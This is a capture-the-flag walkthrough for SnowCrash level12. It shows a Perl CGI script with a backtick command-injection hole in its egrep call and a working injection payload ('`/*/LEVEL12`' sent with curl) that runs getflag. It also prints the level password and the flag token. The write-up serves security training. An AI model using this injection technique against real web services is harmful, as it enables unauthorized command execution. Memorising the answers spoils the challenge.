level11@SnowCrash:~$ su level12
Password: fa6v5ateaw21peobuub8ipe6s

level12@SnowCrash:~$ ls -l
-rwsr-sr-x+ 1 flag12 level12 464 Mar  5  2016 level12.pl

level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));

********************************************************************************
The exploit here is open to all to see, the `` around the egrep tell us
that we can execute a shell command here. But our entries will be modified.
********************************************************************************

  $xx =~ tr/a-z/A-Z/; Make all letters upercase.
  $xx =~ s/\s.*//; Suppress all space.

********************************************************************************
So we will create a file whose name is in uppercase, and whose containing a
call to getflag, and we will use substitution (*) to make the shell find it
among the directories. It needs to be the only file with this name for the
substitution to work.
********************************************************************************

level12@SnowCrash:~$ echo 'getflag > /tmp/level12' > /tmp/LEVEL12
level12@SnowCrash:~$ cat /tmp/LEVEL12
getflag > /tmp/level12
level12@SnowCrash:~$ chmod 777 /tmp/LEVEL12
level12@SnowCrash:~$ curl localhost:4646?x='`/*/LEVEL12`'
..level12@SnowCrash:~cat /tmp/level12
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
